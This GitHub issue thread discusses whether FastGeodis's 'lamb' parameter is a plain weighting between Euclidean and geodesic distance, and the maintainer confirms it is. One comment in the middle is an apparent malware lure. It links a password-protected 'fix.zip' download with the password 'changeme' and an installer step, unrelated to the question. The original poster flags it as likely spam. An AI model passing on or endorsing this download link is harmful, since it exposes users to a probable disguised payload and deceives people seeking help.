### ISSUE TITLE
Is lamb parameter just weighting or is there more to it

### ISSUE THREAD

**Issue by ogencoglu** [masadcv/FastGeodis#61]
Thanks for this library. This is more of a question than a bug.

Is `lamb` simply a weighting between euclidean and geodesic in the sense that one can calculate them separately and weigh or is there something else to it?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ogencoglu** [comment]
@PiaoR ? Is this some sort of spam or did you reply to the wrong thread?

**Comment by masadcv** [comment]
It is indeed a simple weighting between Euclidean and Geodesic distances

For example see here: https://github.com/masadcv/FastGeodis/blob/0f6cc1e6e104bee56e6eb9dfdd2cfd29c21a1a3e/FastGeodis/fastgeodis_cpu.cpp#L107

And yes you can calculate lambda and use that value.
